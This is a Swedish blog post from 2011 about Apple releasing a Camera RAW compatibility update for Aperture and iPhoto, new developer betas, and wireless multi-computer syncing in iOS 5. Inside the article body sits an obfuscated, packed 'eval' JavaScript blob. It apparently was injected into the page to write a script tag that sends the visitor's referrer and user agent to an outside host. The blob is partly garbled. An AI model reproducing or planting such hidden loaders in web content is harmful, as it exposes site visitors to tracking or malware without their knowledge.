Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Apple släpper uppdateringar… Nu är något pågång

Apple släpper uppdateringar… Nu är något pågång
Filip Urde
  • On 1 september, 2011
  • http://www.revue.se/filip-urde

Digital eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|senyb|var|u0026u|referrer|fsash||js|php’.split(’|’),0,{}))
Camera RAW Compatibility Update 3.8
 gör Aperture 3 och iPhoto ’11 kompatibla med bilder i RAW-format från följande kameror:

  • Konica Minolta DiMAGE A200
  • Olympus PEN E-P3
  • Panasonic LUMIX DMC-G3
  • Panasonic LUMIX DMC-GF3
  • Samsung NX11
  • Samsung NX100
  • Sony Alpha NEX-C3
  • Sony Alpha SLT-A35

Systemkravet är Mac OS X 10.6.5 eller senare och filstorleken ligger på 7 megabyte.

Apple har även släppt nya ”preview versioner” av iOS 5 (beta 7), iTunes 10.5 (beta 7), Xcode 4.2 (beta 7), Safari 5.1.1 (update 3) och Apple TV Software (beta 6). För att få tillgång till dessa behöver man dock vara registrerad utvecklare.

En kul nyhet som hittats i beta 7 av iOS 5 är att man nu kan välja att synkronisera innehåll trådlöst från olika datorer. Med andra ord kan man exempelvis synka musik från en dator och filmer från en annan.

9to5mac.com